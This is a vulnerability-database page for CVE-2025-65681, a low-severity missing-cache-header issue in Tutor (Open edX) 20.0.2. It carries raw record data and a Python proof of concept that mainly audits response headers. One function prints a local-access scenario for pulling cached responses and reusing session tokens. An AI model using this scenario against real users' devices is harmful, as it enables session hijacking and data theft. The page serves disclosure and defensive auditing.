Security Vulnerability Report
CVE-2025-65681 CVSS 3.3 LOW

CVE-2025-65681

Published: 2025-11-26 19:15:50
Last Modified: 2025-12-30 15:38:15

Description

An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:edly:tutor:20.0.2:*:*:*:*:*:*:* - VULNERABLE
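overhangio/tutor < 20.0.2
tutor-open-edx < 20.0.2
overhangio/tutor = 20.0.2 (affected version)
Note: the "< 20.0.2" ranges above are not backed by the CVE record on this page; its description and CPE entry name version 20.0.2 only, and no fixed version is stated.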

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
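# CVE-2025-65681 PoC - Information Disclosure via Missing Cache-Control Headers
# Affected version per the CVE record: overhangio/tutor 20.0.2
#
# This script only audits response headers. Run it against an instance you
# operate or are authorized to test.
import re
from urllib.parse import quote, urljoin

import requests

# Endpoint templates the original PoC lists as "should have Cache-Control
# headers". "{username}" and "{course_id}" are placeholders that must be
# filled in before the URL is requested.
SENSITIVE_ENDPOINTS = (
    "/api/user/v1/accounts/{username}",
    "/account/settings",
    "/api/enrollment/v1/enrollment",
    "/api/courseware/v1/courses/{course_id}",
)

# Matches one "{name}" placeholder in an endpoint template.
_PLACEHOLDER = re.compile(r"\{(\w+)\}")


def _assess_cache_headers(headers):
    """Return ``(storable, issues)`` for one response's caching headers.

    ``storable`` is True when nothing in ``Cache-Control`` forbids a browser
    from writing the response to its cache (header absent, or present without
    the ``no-store`` directive). ``issues`` is a list of human-readable
    findings; a missing ``Pragma`` header is reported there but does not by
    itself make the response storable.
    """
    cache_control = headers.get('Cache-Control')
    pragma = headers.get('Pragma')

    issues = []
    storable = False

    if not cache_control:
        storable = True
        issues.append("Missing Cache-Control header")
    else:
        # Compare whole directive names so that an unrelated token which
        # merely contains the text "no-store" is not mistaken for it.
        directives = {
            part.split('=', 1)[0].strip().lower()
            for part in cache_control.split(',')
        }
        if 'no-store' not in directives:
            storable = True
            issues.append("Cache-Control does not contain 'no-store'")

    # Check for missing Pragma: no-cache (for HTTP/1.0 compatibility)
    if not pragma:
        issues.append("Missing Pragma: no-cache header")

    return storable, issues


def check_missing_cache_control(url, session=None, path_params=None):
    """Audit the listed endpoints of ``url`` for cache-preventing headers.

    Args:
        url: Base URL of the instance to audit.
        session: Optional object with a ``requests``-compatible ``get()``
            (for example a ``requests.Session`` that carries the tester's own
            login). Without it the requests are anonymous.
        path_params: Optional dict supplying values for the ``{username}``
            and ``{course_id}`` placeholders. A template whose placeholder has
            no value is reported as skipped instead of being requested with
            literal braces in the path.

    Returns:
        A list of dicts, one per endpoint that was answered or skipped, with
        the keys ``endpoint``, ``url``, ``status_code``, ``cache_control``,
        ``pragma``, ``has_vulnerability``, ``issues`` and ``checked``.
        ``has_vulnerability`` is True only when a 2xx response may be stored
        by the browser. Redirects and error responses are marked
        ``checked=False``: they are not followed and do not count as
        findings. Endpoints whose request raised are printed and left out of
        the list.
    """
    print(f"[*] Checking {url} for missing Cache-Control headers...")

    http = session if session is not None else requests
    values = path_params or {}
    results = []

    for template in SENSITIVE_ENDPOINTS:
        unfilled = [
            name for name in _PLACEHOLDER.findall(template)
            if name not in values
        ]
        if unfilled:
            print(f"[-] Skipped {template}: no value for {', '.join(unfilled)}")
            results.append({
                'endpoint': template,
                'url': None,
                'status_code': None,
                'cache_control': None,
                'pragma': None,
                'has_vulnerability': False,
                'issues': [f"Not checked: no value for {', '.join(unfilled)}"],
                'checked': False,
            })
            continue

        # Percent-encode each value so it stays a single path segment and
        # cannot add extra segments or a query string to the request.
        endpoint = _PLACEHOLDER.sub(
            lambda match: quote(str(values[match.group(1)]), safe=''),
            template,
        )
        full_url = urljoin(url, endpoint)

        try:
            # Do not follow redirects: the headers of a login page reached
            # through a redirect say nothing about the endpoint itself.
            response = http.get(full_url, timeout=10, allow_redirects=False)
        except requests.RequestException as e:
            print(f"[-] Error checking {endpoint}: {e}")
            continue

        storable, issues = _assess_cache_headers(response.headers)

        # Only a successful response can carry the data the CVE is about.
        # A 3xx/4xx/5xx answer without no-store is not evidence of the issue.
        served_content = 200 <= response.status_code < 300
        has_cache_issue = storable and served_content
        if not served_content:
            issues.append(
                f"Inconclusive: HTTP {response.status_code} returned, "
                "endpoint content was not served"
            )

        results.append({
            'endpoint': endpoint,
            'url': full_url,
            'status_code': response.status_code,
            'cache_control': response.headers.get('Cache-Control'),
            'pragma': response.headers.get('Pragma'),
            'has_vulnerability': has_cache_issue,
            'issues': issues,
            'checked': served_content,
        })

        if has_cache_issue:
            print(f"[!] VULNERABLE: {endpoint}")
            print(f"    Issues: {', '.join(issues)}")
        elif not served_content:
            print(f"[?] INCONCLUSIVE: {endpoint} (HTTP {response.status_code})")
        else:
            print(f"[+] SECURE: {endpoint}")

    return results


def exploit_cache_poisoning(url, session_cookie):
    """Print the local-cache exposure scenario; performs no requests.

    Despite its name this function does not poison any cache and does not
    exploit anything: it only prints text. The scenario it describes is
    disclosure of responses already stored in the victim's browser cache
    (the CVE record lists CWE-524 and CWE-384). ``url`` and
    ``session_cookie`` are unused and kept so existing callers still work.

    Note: This requires local access to the victim's browser cache
    """
    print("\n[*] Exploitation requires local browser cache access")
    print("[*] Attack scenario:")
    print("    1. Attacker gains local access to victim's device")
    print("    2. Attacker opens browser developer tools or cache directory")
    print("    3. Attacker extracts cached API responses with sensitive data")
    print("    4. Attacker uses cached session tokens for session hijacking")
    print("\n[!] This PoC demonstrates the vulnerability but actual exploitation")
    print("[!] requires access to the victim's browser cache storage.")
    print("\n[*] Mitigation: send 'Cache-Control: no-store' on authenticated")
    print("[*] responses and invalidate the session server-side at logout.")


if __name__ == "__main__":
    # Placeholder: replace with the base URL of your own instance.
    target_url = "https://your-tutor-instance.com"

    print("=" * 60)
    print("CVE-2025-65681 - Missing Cache-Control Headers PoC")
    print("Affected (per CVE record): overhangio/tutor 20.0.2")
    print("=" * 60)

    results = check_missing_cache_control(target_url)

    vulnerable_count = sum(1 for r in results if r['has_vulnerability'])
    checked_count = sum(1 for r in results if r['checked'])
    not_checked = len(results) - checked_count
    print(
        f"\n[*] Summary: {vulnerable_count}/{checked_count} checked endpoints "
        f"vulnerable ({not_checked} inconclusive or skipped)"
    )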

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65681", "sourceIdentifier": "[email protected]", "published": "2025-11-26T19:15:49.590", "lastModified": "2025-12-30T15:38:14.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Overhang.IO (tutor-open-edx) (overhangio/tutor) 20.0.2 allowing local unauthorized attackers to gain access to sensitive information due to the absence of proper cache-control HTTP headers and client-side session checks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-384"}, {"lang": "en", "value": "CWE-524"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edly:tutor:20.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "8E45B355-FE47-48FE-BBA9-20C4970A693E"}]}]}], "references": [{"url": "https://docs.tutor.edly.io", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Rivek619/CVE-2025-65681", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/overhangio/tutor", "source": "[email protected]", "tags": ["Product"]}]}}